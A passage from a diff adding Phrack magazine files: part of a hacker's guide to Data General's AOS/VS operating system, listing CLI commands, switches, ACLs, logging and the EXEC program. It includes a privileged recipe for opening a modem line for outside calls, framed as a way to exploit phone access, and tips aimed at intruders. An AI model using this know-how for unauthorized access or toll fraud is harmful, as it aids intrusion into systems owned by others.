+name, and USE changes the value in the !DEFAULT variable (your username).
+
+Logins are handled by a program called EXEC (that's what the EXEC-32
+x.xx.xx.xx part in the login message means).  EXEC just reads the
+username/password and if correct, logs the user in.  After EXEC has been
+completed, the Initial Program from the profile is run.  The commands for
+logins are CONTROL @EXEC DISABLE and ENABLE.  See "The 'EXEC' Program"
+for more information about EXEC.
+
+When using ENABLE, the console receives login capabilities; apart from
+actually logging in, EXEC will also display :UTIL:LOGON.BANNER.SCREEN.
+
+ENABLE
+------
+
+/ALL      Gives all the consoles the said capabilities.
+
+/TRIES=x  Sets maximum login tries to x.
+
+/STOP     This will have the same result as if an operator issued
+          CONTROL @EXEC DISABLE <console> after the maximum login tries
+          was exceeded.
+
+/CONTINUE
+
+          Lock console for 10 seconds and then continue.
+
+/FORCE    Change the other parameters while the console is enabled.
+
+
+SYSTEM COMMANDS
+~~~~~~~~~~~~~~
+
+Every command has its own switches.  However, all commands accept the
+/1, /2, /L and /Q switches (and /STR=string and /ESTR=string under
+/CLI32).
+
+/1=ERROR|ABORT|IGNORE|WARNING
+/2=WARNING|ERROR|ABORT|IGNORE
+
+          Controls what the program will do under a class 1 or 2 error.
+          The first option listed is the default.  ERROR displays
+          "Error: something" and stops command execution.  ABORT aborts
+          the command.  IGNORE ignores the error, and WARNING displays
+          "Warning: something" and continues with the command.
+
+/L=path   The command will store all its output in 'path'.
+
+/Q        Display output in columns with on space separating them (an
+          exception to this switch is TYPE).
+
+/STR=string
+/ESTR=string
+
+          The command will store its output in the 'string' string
+          variable, which can be viewed later using the STRING command.
+          If there is no output or the command is TYPE or COPY the string
+          is set to null.  /ESTR is for error output, /STR is for
+          regular output.
+
+Some important AOS/VS commands are listed next.  I included information
+about the DUMP and LOAD commands for information purposes only; as they
+require diskettes, I don't think you'll use them daily.  However, I
+didn't go into diskette handling, etc in detail.
+
+Sorted alphabetically:
+
+
+ACL <path>
+----------
+
+ACL is a utility to control the ACL (Access Control List).  An ACL is
+just what is sounds like: it includes a list of usernames and what kind
+of access they have to the file.  ACL used one-letter access code, as
+follows.
+
+         LETTER                 TYPE/FILE                    TYPE/DIR
+      -----------+---------------------------------+------------------------
+       A(ppend)     Append to a file.                 Create files in the
+                                                      directory or move files
+                                                      into it.
+
+       E(xecute)   Execute the program.               Allows access to
+                                                      the directory
+                                                      (changing into it,
+                                                      reading, etc).
+
+       O(wner)      Allows the user to change the ACL or erase the file/dir.
+
+       R(ead)       Read a file.                      List the files in
+                                                      the directory.
+
+       W(rite)      Write to a file.                  Create, delete or
+                                                      change ACLs of files
+                                                      in the directory.
+
+The default ACL for any file is OWARE for the user.
+
+ACL <path> shows the ACL.  To modify the ACL:
+
+ACL <path> [user,access] [...]
+
+Access being one of the OWARE group, for example:
+
+ACL PHRACK43 HBT,OWARE       (There is NO space between 'username' and
+                             'access'!)
+
+ACL PHRACK42 HBT,OWARE +,R   (In this example, the '+' template was
+used, '+' standing for all the users.  This means that HBT has full
+access to the file, while the rest of the users can only read it.
+If templates are used, they should be used last, with specific usernames
+before them.)
+
+Under CLI32 group access is also available in the format of:
+
+ACL <path> [user:group,access] [...]
+
+Switches:
+
+/[BEFORE|AFTER]/[TCR|TLA|TLM]=date and/or time
+
+/TYPE=type
+
+          These function just like the same switches in FILESTATUS.
+
+/D        Use the default settings (OWARE).  Defaults may be changed
+          using DEFCAL.
+
+/K        Delete ACL - no one but a superuser will be able to access the
+          file.
+
+/V        Show each file changed.
+
+
+BROWSE
+------
+
+BROWSE is a program to browse (view, search, scroll in any direction)
+through any number of ASCII or binary files.  While in BROWSE help is
+available by using 'H' or '?'.  BROWSE starts at the end of file and
+lets you move backward (but you can change this).
+
+No further details are included since BROWSE can run only on CRT
+terminals (the actual terminals the employees usually sit at), and I
+didn't have the pleasure of using one of these (nor do I think will the
+information be of any use).
+
+
+CHARACTERISTICS
+---------------
+
+CHARACTERISTICS displays or sets the characteristics of a device
+attached to a terminal (not a printer, for example).  To change
+characteristics of a device permanently and not just for the current CLI
+level, you must be PID 2 (local console) or have SYSTEMMANAGER privilege
+on.  To this, you must use EXEC first to DISABLE the device, use
+CHARACTERISTICS, and then use EXEC to ENABLE the device (see the section
+titled "The 'EXEC' Program").  The CHARACTERISTICS switch will be
+/DEFAULT/[default device characteristics] device.  "device" for example,
+is @CON100.
+
+CHARACTERISTICS switches look like this:
+CHARACTERISTICS /[ON|OFF]/SWITCH.  It's self explanatory.
+
+/8BT
+
+          Interpret all 8 bits of an ASCII char as data.  (For use with
+          8 bit character sets, of course.)
+
+/16B      For Asian language translation.
+
+/4010I    Device is a DG model 4010I terminal.
+
+/6012     Device is a DG model 6012 terminal.
+
+/605X     Device is a DG DASHER model 6052, 6053, D210 or D211 terminal.
+
+/6130     Device is a DG DASHER model 6130, D410 or D460 terminal.
+
+/ACC      Line requires modem access control (only users with the Use
+          Modem privilege may login).
+
+/AUTOBAUD
+
+          The system will automatically determine the terminal's baud
+          (it's bps, damnit!) rate.
+
+/BAUD=b
+
+          Sets a device's bps rate to b.  b can be 45.5, 50, 75, 110,
+          134.5, 150, 300, 600, 1200, 1800, 2400, 3600, 4800, 7200,
+          9600, 19200, 38400.
+
+/BREAK=[BMOB|CAOB|CBOB|CFOB|DCOB]
+
+          How the system will respond to a BREAK:
+          BMOB (default) Clears binary mode and restore normal character
+                         handling
+          CAOB           Issues Ctrl-C Ctrl-A
+          CBOB           Issues Ctrl-C Ctrl-B
+          CFOB           Issues Ctrl-C Ctrl-F
+          DCOB           Disconnect user
+
+/CALLOUT  Allow host initiated calls (outside calls).
+
+/CHARLEN=[5|6|7|8]
+
+          Character length in bits, *including* stop bit.
+
+/CONTYPE=connection type
+
+          Connection types are:
+          BITMAPPED      Windowing terminal
+          DIRECT         Standard connection
+          PAD            From PAD hardware
+          PBX            From a PBX controller
+          PCVT           From a DG/PC*i controller
+          TERMSERVER     From terminal server hardware
+          TELNET         Through telnet
+          VIRTUAL        Through a virtual terminal
+
+/CPL=[8-255]
+
+          The maximum number of characters per line.
+
+/CTD      Disconnect line if the user doesn't respond to login after a
+          while.
+
+/DEFAULT  Displays the default characteristics of the terminal.
+
+/DKHW     If OFF, and /16B and /8BT are on, enable support for Chinese
+          characters.
+
+/EB0      Specify the echoing of control characters.
+/EB1      When both off, nothing is echoed.
+          When EB0 is on and EB1 is off, echos ^char.
+          When EB0 is off, and EB1 is on, echos exactly what was entered.
+
+/EOL      Don't output a newline if the number of characters in input
+          has exceeded the line length.
+
+/ESC      Interpret an escape as a Ctrl-C Ctrl-A interrupt.
+
+/FF       Output a formfeed when the device opens.
+
+/G1G0     Enables the G1G0 character set (Taiwanese characters).  /16B
+          and /8BT must also be ON.
+
+/HARDCOPY Device is a printing terminal.
+
+/HDPX     Provide half duplex support for a modem line.
+
+/HIFC     Use CTS/RTS input flow control, cannot be on if /HDPX or /MOD are
+          on.
+
+/HOFC     Use CTS/RTS output flow control.
+
+/IFC      Enables XON/XOFF to control terminal input (the Ctrl-S/Ctrl-Q
+          control characters).
+
+/LEVEL=x  Sets characteristics to the same as those in CLI level #x.
+
+/LPP=[4-255]
+
+          The number of lines per page.
+
+/MDUA     Allows direct access to the modem on the line (/MOD must also
+          be set).  You can then use ?WRITE to send commands to the
+          modem.  See the section titled "CLI Macro Programming".
+
+/MOD      Use modem interface on this line.
+
+/MRI      Monitor line for rings.
+
+/NAS      Device is non ANSI standard.
+
+/NLX      Enable Asian natural language translation.  /16B and /8BT must
+          also be ON.
+
+/NRM      Suppress messages (from SEND) not sent from PID 2 (something
+          like "mesg n" in Unix).
+
+/OFC      XON/XOFF output flow control.
+
+/OTT      Convert characters sequence "~}" to an escape (use with VT100
+          emulation, or how will you escape).
+
+/P        Sets the characteristics to be the same as those used on the
+          previous CLI level.
+
+/PARITY=[ODD|EVEN|NONE]
+
+          Default is NONE.
+
+/PM       Enable page mode, which pauses output every LPP lines (as set
+          with the /LPP switch, default is 24).  Ctrl-Q resumes.
+
+/RESET    Reset characteristics to the default value.
+
+/RTSCD    Check carrier detect before processing RTS signals.  /HDPX
+          must be ON.
+
+/SFF      Simulate formfeeds.
+
+/SMCD     Ignore carrier detect on modem lines.  /MOD and must be ON,
+          and this must be set if /HPDX is ON.
+
+/ST       Simulate a tab every 8 columns.
+
+/STOPBITS=[1|1.5|2]
+
+/TCC=[time to wait for a carrier detect signal after the modem connect]
+
+          Default is 40000 ms.
+
+/TCD=[time to wait for a carrier detect signal to return after it drops]
+
+          Default is 5000 ms.
+
+/TDW=[delay between modem connect and the first I/O]
+
+          Default is 2000 ms.
+
+/THC=[the amount of time after disconnecting for the modem to settle]
+
+          Default is 10000 ms.
+
+/TLT=[time to wait between sending the last char and dropping RTS]
+
+          Default is 0 ms.  /HPDX must be ON.
+
+/TO       Enable timeouts.
+
+/UCO      Convert lowercase input to uppercase when displaying it.
+
+/ULC      Accept both uppercase and lowercase as input.
+
+/WRP      Wrap on a long line.
+
+/XLT      Enable VT100 terminal emulation.
+
+Knowledge is knowledge, but AT&T is something different.  Here is how
+you'd open a modem line for calling out:  (You must be SYSTEMMANAGER)
+
+CLEARDEVICE/RXON @CON999
+CONTROL @EXEC DISABLE @CON999
+CHARACTERISTICS/ON/MOD/MDUA/CTD/CALLOUT @CON999
+CONTROL @EXEC ENABLE @CON999
+((And here's how you put it back))
+CLEARDEVICE/RXON @CON999
+CONTROL @EXEC DISABLE @CON999
+CHARACTERISTICS/DEF @CON999
+CONTROL @EXEC ENABLE @CON999
+
+
+CLEARDEVICE <device>
+--------------------
+
+You must be PID 2 (local console) or have SYSTEMMANAGER privileges
+turned on to use CLEARDEVICE on a terminal that isn't yours.  <device>
+must be a terminal line (eg, @CON100).
+
+/RXON     Simulates a XON character from the device.
+
+/SBREAK   Sends a break character to the device.
+ 
diff --git a/phrack44/15.txt b/phrack44/15.txt
new file mode 100644
index 0000000..dc0e2f2
--- /dev/null
+++ b/phrack44/15.txt
@@ -0,0 +1,1377 @@
+                              ==Phrack Magazine==
+
+                 Volume Four, Issue Forty-Four, File 15 of 27
+
+()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()
+
+                 A Guide to Data General Corporation's
+
+                             AOS/VS System
+                                PART II
+
+                             by Herd Beast
+
+
+CONINFO [console]
+-----------------
+
+CONINFO shows information about a console to the user.  Without an
+argument, it gives the user information about his console.  With a
+parameter, and if the user has SYSTEMMANAGER privilege turned on, it
+gives information about the console specified as argument.  The
+information gives changes depending as to how the console is connected:
+
+                 CONNECTION                   INFORMATION
+          ------------------------+---------------------------------
+          ITC/LTC over TCP/IP       Device code, engine number,
+                                    line number, IP address,
+                                    port number.
+
+          ITC/LTC over XNS          Device code, engine number,
+                                    line number, CS/200 ethernet
+                                    address.
+
+    ((No remote address if no connection exists (on both of them).))
+
+          ITC/PVC                   Device code, engine number,
+                                    engine address, line number,
+                                    line address OR an ASCII string if
+                                    the PVC type is NAME.
+
+          Telnet                    Line number, IP address, port.
+                                    Only line number if there's no current
+                                    connection.
+
+          IACs                      Device code, engine number, line
+                                    number, modem flag.
+
+          Duarts                    Device code, engine number, line
+                                    number, CON0 flag.
+
+          TTI/TTO Opcon             Device code, engine number, line
+                                    number, CON0 flag.
+
+
+CREATE <pathname>
+-----------------
+
+CREATE creates a file (TXT or UDF).  CREATE/LINK creates file links.
+
+/DATASENSITIVE
+
+          Creates a file with a data sensitive record format.
+
+/DIRECTORY
+
+          Creates a directory.
+
+/DYNAMIC
+
+          Creates a file with a dynamic record format.
+
+/ELEMENTSIZE=x
+
+          Sets the minimum amount of space by which a file can grow in 512
+          byte blocks.
+
+/FIXED=x
+
+          Creates a file with a fixed length record format, with a
+          length of x.
+
+/HASHFRAMESIZE=x
+
+          Sets the unit into which the system divides the directory for file
+          access to x.  The default is 7.  The best formula for this is: the
+          nearest prime number (up to 157, the maximum) of the number of
+          files / 20.
+
+/I
+
+          Inserts typed text at @INPUT as the contents of the file.  The
+          input ends when a single ')' followed by a Return is typed.
+
+/INDEXLEVELS=x
+
+          Sets the maximum number of data elements the file can hold to x.
+
+/LINK
+
+          Creates a linked file to the second argument.  For example, to link
+          MODEM.CLI with :UTIL:NET:MODEM.CLI, use CREATE/LINK MODEM.CLI
+          :UTIL:NET:MODEM.CLI.
+
+/M
+
+          Takes the contents of the file from a macro that follows.  The
+          input ends when a single ')' followed by a Return is typed.
+
+/MAXSIZE=x
+
+          Creates a control point directory of x*512 bytes (a disk block).
+
+/TYPE=t
+
+          Creates a file of type t.  Where t is either the right decimal
+          number or the right 3 letter mnemonic (see the section titled
+          "System Structure").
+
+/VARIABLE
+
+          Creates a file with variable record formats.
+
+
+DELETE <file>
+-------------
+
+Deletes file.  The opposite of CREATE.
+
+
+DUMP <file> [path]
+------------------
+
+DUMP dumps file from the current directory to a file.  Such files can be
+a diskette or a magnetic tape.  [path] is the template for the files to
+dump -- if it doesn't exist, everything will be dumped.  DUMP isn't
+compatible with Unix; AOS/VS has a TAR command for dumping file for use
+in Unix.
+
+/[AFTER|BEFORE]/[TLA|TLM|TCR]=date and/or time
+
+/TYPE=[\]type
+
+          These switches works just like the one in FILESTATUS.
+
+/BUFFERSIZE=x
+
+          Sets the buffer to x (x is a multiply of 1024).  x is given in
+          bytes, but if specified as xK it reads a kilobytes (1 kilobyte
+          is 1024 bytes).  The larger the buffer, the more data fits on
+          the tape.
+
+/DENSITY=[800|1600|6250|ADM|LOW|MEDIUM|HIGH]
+
+          The numbers are for bits per inch.  ADM means Automatic
+          Density Matching.  If one of the other values is used, there's
+          a possibility that it won't fit in another tape unit (unit X's
+          LOW value isn't the same as unit Y's).
+
+/FLAT
+
+          Eliminates the directory structure.  Otherwise, DUMP keeps the
+          directory tree when dumping.
+
+/IBM
+
+          Writes to a tape that an IBM format label, created using
+          LABEL/I.
+
+/L[=pathname]
+
+          Lists filenames dumped in pathname, or in @LIST.  (See the
+          command after LOAD, 'LISTFILE').
+
+/NACL     Don't dump ACLs, so that when reloading, the default ACL will
+          be created.
+
+/RETAIN=x
+
+          Sets the retention period.  The dumpfile cannot be overwritten
+          until x days have passed.
+
+/SEQUENTIAL
+
+          Will not rewind the tape after completing the dump.
+
+/V        Verify the dump by listing the dumped files.
+
+
+FED
+---
+
+FED (moohaha), is a program, not a CLI command.  FED stands for File
+Editor Utility, and it lets you examine locations in disk files and
+modify them.  FED is run as XEQ FED [path].  The FED inner prompt is
+'_'.
+
+FED has internal keywords.  They are run by using ESC <keyword> (if you
+can't use escape, try setting CHAR/ON/XLT/OTT and use "~}").
+
+To understand FED well, you must be familiar with the DEBUG command and
+some Assembly, which seems to me is beyond the scope of this file.  So
+if you do know what you're doing, look DEBUG up.
+
+C    Run a CLI under FED.
+DIS  Change display mode
+G    Examine/modify ring register
+H    Help
+I    Define/list temporary symbols
+J    Delete temporary symbols
+M    Examine/modify input radix
+MEM  Examine/modify file locations
+S    Search disk locations
+T    Examine/modify display mode
+X    Enable/disable symbol table
+Y    Enable/disable logging to a file
+Z    Exit FED
+?    Display verbose error messages
+
+/I=file   Use the commands in filename for the editing session.
+
+/L=file   Save all FED commands/responses to file.
+
+/S=file   Use file as the symbol table file.
+
+/N        Don't use a symbol table file.
+
+/P        Treat the disk file as a program file.
+
+/R        Open for read-only.
+
+/U        Treat the disk data as a user data file.
+
+/X        Treat the disk file as an OS file.
+
+
+LOAD <file> [path]
+------------------
+
+LOAD restores files that were dumped.  If LOAD is invoked from CLI32, a
+macro calls the DUMP_II program, which is a more advanced version of
+DUMP.  If [path] is omitted, the entire dumpfile is loaded into the
+current directory (with its directory tree).
+
+/[AFTER|BEFORE]/[TLA|TLM|TCR]=date and/or time
+
+/TYPE=[\]type
+
+          These switches function the same as in FILESTATUS.
+
+/BUFFERSIZE=x
+
+/DENSITY=density was already set with DUMP, use ADM if at all
+
+/FLAT
+
+/IBM
+
+/L[=path]
+
+/NACL
+
+/SEQUENTIAL
+
+/V
+
+          These switches function the same as in DUMP, only in the
+          reverse direction (for example, /NACL won't load the
+          dumpfile's ACL and create new default --  username,OWARE
+          -- ACLs.
+
+/DELETE
+
+          Delete any existing file with matching name.
+
+/N        Don't load, just list files in dumpfile.
+
+/Q        Squeeze console messages and file lists (don't use tabs and
+          more than one space).
+
+
+LISTFILE [path]
+---------------
+
+LISTFILE sets the @LIST file (see the section titled "System Structure"
+for details).  In short, program uses the generic file name @LIST, it
+will use the files specified through LISTFILE instead.
+
+/G        Sets the LISTFILE to the generic @LIST.
+
+/K        Sets the LISTFILE to null.
+
+/LEVEL=x  Sets the LISTFILE to that of level number x LISTFILE.
+
+/P        Sets the LISTFILE to the previous environment setting.
+
+
+PASSWORD
+--------
+
+Only exists with CLI32.
+
+(For more information, see the section titled "System Structure").
+
+/CHANGE   Change the current CLI password.
+
+/PROMPT
+/NOPROMPT
+
+          If /PROMPT, the user will have to enter his password when
+          using LOCK (so he can't LOCK the console without a password).
+          Otherwise, automatically locks the console when LOCK is
+          executed.
+
+/READ=path
+/WRITE=path
+
+          /WRITE Encrypts the CLI password and writes it to the file
+          [path].  When /READ is issued, the encrypted password is read
+          from the file.  When a password check needs to be done, the
+          password entered is encrypted and the encrypted forms are
+          compared.  This way, a "PASSWORD/READ=PWD" in the LOGON file
+          can set the CLI password automatically at logon.
+
+I am not sure of the way that the password in encrypted when being saved
+with /WRITE.  Nor, for that matter, do I have any more information about
+the way the login passwords are encrypted in the profiles (when and if
+they are).
+
+Beware of situation where PWD, for example, has the string "qwerty" in
+it, and you type PASSWORD/READ=qwerty.  If you use LOCK, the terminal is
+locked forever, since "qwerty" is assumed to be the encrypted form.
+
+
+PROCESS <path>
+--------------
+
+Creates a son process to run the program in <path>.  <path> is assumed
+to end with .PR, and only then to be just <path>.
+
+/ACCESSDEVICES
+
+          Allows the process to define and access I/O devices.  Requires
+          the Access Devices privilege as defined in the profile.
+
+/BLOCK
+
+          Blocks the father CLI until the process terminates.  If the
+          CLI isn't blocked, you can use CHECKTERMS to display the
+          process' termination message when it terminates.
+
+/BREAK
+
+          Creates a break file (.BRK) if the process has an error or
+          terminates because of one.  If EXEC is TERMINATEd instead of
+          HALTed using the HALT 'EXEC' command, it will create a .BRK
+          file.
+
+/BSON
+
+          Blocks the son process until freed with UNBLOCK.
+
+/CHLOGICALTYPE
+
+          Allows the process to change its logical type (16 bit or 32
+          bit).  Requires the Change Logical Type privilege, which, as
+          mentioned in "System Security" is usually on.
+
+/CHPRIORITY
+
+          Allows the process to change its priority.  Requires Change
+          Priority privilege.
+
+/CHTYPE
+
+          Allows the process to create any other type of process and
+          change its own process type.  Requires Change Type privilege.
+
+/CHUSERNAME
+
+          Allows the process to create a new process with a different
+          username than its own.  Requires Change Username privilege.
+
+/CHWSS
+
+          Allows the process to change its working set size.  Requires
+          Change Working Setsize privilege.
+
+/CONSOLE[=console]
+
+          Makes the new process' console the same as that of the
+          father's console, or [console].
+
+/CPU=x    Limits CPU time for x seconds.
+
+/DACL     Don't pass default ACL to the son process.
+
+/DATA[=path]
+
+          Make the son's @DATA file the same as the father's, or [path].
+
+/DEBUG    Starts the son process in the debugger.
+
+/DEFAULT  Gives the son process the same privileges as the father's.
+
+/DIRECTORY=path
+
+          Make path the initial directory for the son process.
+
+/DUMP     Appends a dump to the breakfile data.
+
+/INPUT[=path]
+
+          Makes the son's @INPUT file the same as the father's, or
+          [path].
+
+/IOC
+
+          Makes the son's @INPUT, @OUTPUT AND @CONSOLE the same as does
+          of the father.
+
+/LIST=[path]
+
+          Makes the son's @LIST file the same as the father's, or
+          [path].
+
+/MEMORY=x Sets the son's process maximum memory size in 2kb pages.
+
+/NAME=name
+
+          Assign name to the son process.  Now it can accessed both by
+          PID and by name.
+
+/OUTPUT=path
+
+          Makes the son's @OUTPUT file to be path.
+
+/PRIORITY=x
+
+          Gives the process a priority of 1-511 (highest-lowest).
+
+/PREEMTIBLE
+/RESIDENT
+
+          Makes the son process pre-emtible or resident.  The default is
+          swappable.
+
+/SONS[=x]
+
+          Allows the son to create one less son process than the father,
+          or x.
+
+/STRING
+
+          Stores the termination message in the CLI string.
+
+/SUPERPROCESS
+/SUPERUSER
+
+          Allows the son process to enter the appropriate SUPER mode.
+
+/UNLIMITEDSONS
+
+          Allows the son process to create unlimited amount of sons.
+
+
+SED [path]
+----------
+
+SED is a program and not a CLI command and therefore run as XEQ SED ...
+[path] is the file to be edited.  The SED inner prompt is '*'.
+
+SED is a text editor for creating and modifying files.  SED's help
+facility is accessible by typing HELP from SED:
+
+ESCAPES   ADD TEXT   CHANGE TEXT   DELETE TEXT   LISTINGS   POSITIONING
+-------   --------   -----------   -----------   --------   -----------
+EXECUTE   APPEND      MODIFY        DELETE        LIST       POSITION
+HELP      INSERT      REPLACE       MOVE          VIEW       FIND
+SAVE      DUPLICATE   SUBSTITUTE    JOIN          PRINT
+          UNDO        SPLIT
+                      CUT
+                      PASTE
+
+EXITING   MISC            HELP WORDS
+-------   ----            -----------------------
+ABANDON   CLEAR           CURSOR_CONTROL ADDRESS
+BYE       DIRECTORY       RANGE          SOURCE
+CLI       DISPLAY         SEARCH_STRING  DESTINATION
+DO        SET             KEYS           SYNTAX
+          SPELL           SWITCHES
+
+SED's line editing keys are:
+
+Ctrl-A    Move to end of line.
+Ctrl-B    Move to end of last word.
+Ctrl-E    Toggle insert mode.
+Ctrl-F    Move to start of next word.
+Ctrl-H    Move to beginning of line.
+Ctrl-I    A tab.
+Ctrl-K    Erase everything right of cursor (like in EMACS).
+Ctrl-X    Move on character to the right.
+Ctrl-Y    Move on character to the left.
+Ctrl-U    Delete entire line.
+
+The commands are mostly self explanatory, but the format is something
+like this.  Suppose you want to modify line #12, you'd write MODIFY 12,
+which will put you on line 12.  Use the control keys to move about and
+edit the line, then press Return!  If you don't press return but just
+escape back to the SED prompt, your changes will be lost!
+
+The same goes for most commands, if you need help, just type HELP
+COMMAND from the SED '*' prompt.
+
+
+/ED=dir   Finds the SED .ED files in dir.
+
+/NO_ED    Don't use .ED files.
+
+/NO_FORM_FEEDS
+
+          Strip form feeds from the file.
+
+/NO_RECREATE
+
+          Don't reset the date of the file after changing it.
+
+/NO_SCREEN
+
+          Don't update the console automatically.
+
+/PROFILE=path
+
+          path is the SED startup file, that contains legal SED
+          commands.
+
+/WORK=dir
+
+          Use this directory for SED temporary files.
+
+
+SEND <pid> <message>
+--------------------
+
+Sends sends <message> to a user, based on the user's PID.  Users' PIDs
+are displayed when typing WHOS.  For example, SEND 2 FU I'M A HACKER.
+
+
+STRING [arg]
+------------
+
+Without an argument, STRING displays the contents of the CLI's string.
+Displayed strings have commas inserted in them instead of spaces.
+If an argument is present, the string is set to it.
+
+/K        Set string to null.
+
+/P        Set string to the the string in the previous environment (each
+          CLI level can have a different string).
+
+
+SYSLOG [log file name]
+----------------------
+
+SYSLOG handles system logging activity; therefore, SYSLOG can only be
+run with PID 2 (the master console) or with SYSTEMMANAGER privileges
+turned on.  "System logging" logs user information (processor usage, I/O
+usage) in :SYSLOG.  System logging can be ran under several levels of
+detail, so that it may or may not record everything going on (like file
+accesses).  "Superuser logging" are things caused by a superuser who
+will only be logged under the maximum detailed level; therefore, it's
+possible to log them separately, and not record everything else
+everybody else does.  "Error logging", which logs power failures, hard
+errors and such is always on and goes to :ERROR_LOG.  Finally, there's
+"CON0 logging", which logs all activities on the master console, in such
+a way, that if you view the CON0 log from CON0, the log will never
+end...
+
+/CON0/[START|STOP] [filename]
+
+          Start or stop CON0 logging.  The older CON0 log will be
+          renamed into [filename], and a new log will be opened.
+          Otherwise, the old log is appended to.
+
+/DETAIL=[FULL|MINIMAL]
+
+          Sets (or changes) the level of detail when logging.  The
+          default is MINIMAL; FULL is mostly for security matters.
+
+/NOSOFTTAPEERRORS
+/SOFTTAPEERRORS
+
+          Don't (or do) record soft tape errors.
+
+/RENAMEERROR
+
+          Rename :ERROR_LOG to something else, and keep on logging to a
+          new file.
+
+/START [filename]
+/STOP
+          Start (or stop) logging to :SYSLOG.  If [filename] is given,
+          rename :SYSLOG to it and keep on logging to a new file.
+
+/SUPERUSER/[START|STOP]
+
+          Start (or stop) Superuser logging.  System logging must
+          already be running.
+
+/VERBOSE  Give a detailed status.
+
+Here's a system you wouldn't want to be on:
+
+SmSu) SYSLOG/START BEFORE_WE_WERE_HACKED
+SmSu) SYSLOG/DETAIL=FULL
+SmSu) SYSLOG/CON0=START
+
+
+WHO [hostname:]
+---------------
+
+WHO shows information about processes.  Without arguments, it shows
+your processes' information.  If WHOS is issued, information on all the
+processes is displayed.  The output from WHO is similar to this:
+
+Elapsed 109:21:22, CPU  0:00:35.828, I/O Blocks    0, Page Secs 22186
+PID:     1 PMGR            PMGR            :PMGR.PR
+
+>From left to right, WHO displayed the process ID; username; console;
+and program pathname.
+
+
+WRITE [arg]
+-----------
+
+Displays [arg], by default to @OUTPUT.  [arg] can also be a pseudo macro
+such as [!USERNAME].
+
+/FILEID=file
+
+          Write [arg] to the file specified in file.
+
+/FORCE
+
+          Forces the system to write immediately instead of periodically
+          writing the files.
+
+/NONEWLINE
+
+          Don't include the newline in the output.
+
+
+XEQ <path>
+----------
+
+XEQ is identical to EXECUTE; it executes the program in path (how QT).
+The path should be to a file with a PR (PRogram) suffix, although it
+doesn't have to include .PR.
+
+/I        Takes input from @INPUT, eg from the user.  To end the input,
+          type ')' and Return.
+
+/M        Takes input from a macro that follow.  The input end the same
+          way as with /I.
+
+/S        Stores the termination message in a STRING instead of the
+          terminal screen (@OUTPUT).
+
+THE 'EXEC' PROGRAM
+~~~~~~~~~~~~~~~~~
+
+EXEC does more than just log users on.  EXEC is the program that handles
+the AOS/VS multiuser environment.  If handles user logins, but also
+batch, print, and networking queues, printers, and tape mount requests.
+
+To use any EXEC command, you must either have the username of the EXEC
+user (usually OP) or have SYSTEMMANAGER privileges on.  Alternatively,
+if you have the right ACL (if you're the owner) of the device you're
+executing an EXEC command on, it will also work.
+
+EXEC commands are issued in this manner: CONTROL @EXEC COMMAND.  EXEC
+has its own help facility, called XHELP, which gives help only on EXEC
+commands.
+
+These are the EXEC commands (alphabetically, once again):
+
+ACCESS           CREATE          HOLD           PREMOUNT       STOP
+ALIGN            DEFAULTFORMS    LIMIT          PRIORITY       TERMINATE
+ALLOCATE         DELETE          LOGGING        PROMPTS        TRAILERS
+BATCH_LIST       DISABLE         LPP            PURGE          UNHOLD
+BATCH_OUTPUT     DISMOUNTED      MAPPER         QPRIORITY      UNITSTATUS
+BINARY           ELONGATE        MDUMP          REFUSED        UNLIMIT
+BRIEF            ENABLE          MESSAGE        RELEASE        UNSILENCE
+CANCEL           EVEN            MODIFY         RESTART        VERBOSE
+CLOSE            FLUSH           MOUNTSTATUS    SILENCE
+CONSOLESTATUS    FORMS           OPEN           SPOOLSTATUS
+CONTINUE         HALT            OPERATOR       START
+CPL              HEADERS         PAUSE          STATUS
+
+ACCESS         Change the ACL of files in the :PER directory.  If some
+               has OWNER access to a device or queue, he can issue an
+               EXEC CONTROL command to it.  If he had READ or WRITE
+               access to a queue, he can display it or add jobs to it,
+               accordingly.  The default ACL is +,RW (READ/WRITE access
+               for all users).  The :PER directory contains devices
+               (such as consoles, printers, etc) and queue jobs.
+
+ALIGN          Tells the printer handler to stop printing (giving the
+               operator a chance to align the paper).
+
+ALLOCATE       Restore a tape unit to EXEC's list of mountable tape unit
+               (will show on UNITSTATUS).
+
+BATCH_LIST     Change the print queue to which a batch's listings go.
+
+BATCH_OUTPUT   Change the print queue to which a batch's output go.
+
+BINARY         Tells the printer handler to set or disable BINARY mode.
+               When in binary mode, passes everything sent to the
+               printer as-is.  When binary mode is off, the printing
+               handler catches characters and changes them so they'll
+               have a meaning on the device.  Binary mode is necessary
+               when using a graphics printer, for example.
+
+BRIEF          Opposite of VERBOSE.
+
+CANCEL         Cancels a waiting queue entry.
+
+CLOSE          Prevents a queue from accepting more requests.
+
+CONSOLESTATUS  Displays the status of an EXEC-handled EXEC.  Displays
+               the console's name, maximum number of login tries
+               allowed, the PID, and which user is logged on (if at
+               all).
+
+CONTINUE       Continue a device after changes (for example, running
+               START) have been made to it.
+
+CPL            Changes the number of characters per page for a device.
+
+CREATE         Create a queue.
+
+DEFAULTFORMS   Where the default formatting specs are.
+
+DELETE         Delete a queue.
+
+DISABLE        The opposite of ENABLE.
+
+DISMOUNTED     Dismount a tape mounted with CONTROL @EXEC MOUNT.
+
+ELONGATE       Turns elongated printing on a DASHER LP2 printer on or
+               off.  When printing in elongated printing, the characters
+               are wide.
+
+ENABLE         For more information, see the section titled "System
+               Security".
+
+EVEN           Sets the status of pagination on a printer.  When on, all
+               files are printed as if they have an even number of
+               pages, for cosmetic reasons (all header pages come on the
+               same fold of paper [yes, it sounds disgusting]).
+
+FLUSH          Terminate the currently running job on a device or queue.
+
+FORMS          Use the formatting specs in a filename for a certain
+               printer.
+
+HALT           Terminate EXEC.
+
+HEADERS        Change number of headers printed when printing (default
+               is 1).
+
+HOLD           Suspends a batch or printer queue until UNHOLD is issued.
+
+LIMIT          Enforces limits on CPU processor time or number of
+               printed pages on devices or queues.
+
+LOGGING        Where to send error and status messages instead of CON0,
+               the system console.
+
+LPP            Sets the number of lines per page when printing.
+
+MAPPER         Tells the printing handler to use character mapping as
+               defined in a given filename.
+
+MDUMP          Suspend all other EXEC activities to create a memory dump
+               in the :UTIL directory.
+
+MESSAGE        Append a message to EXEC's log.
+
+MODIFY         Modifies the parameters of an inactive queue entry.
+
+MOUNTSTATUS    Displays the status of all user mount requests.
+
+OPEN           Opens a queue to receive user requests.
+
+OPERATOR       Whether or not there's an operator available to help with
+               diskette dumps (remember what the OPERATOR privilege is
+               used for; not everyone has it).
+
+PAUSE          Suspends processing of a queue or on a device.
+
+PREMOUNT       Mount a labeled tape volume even before a user request it
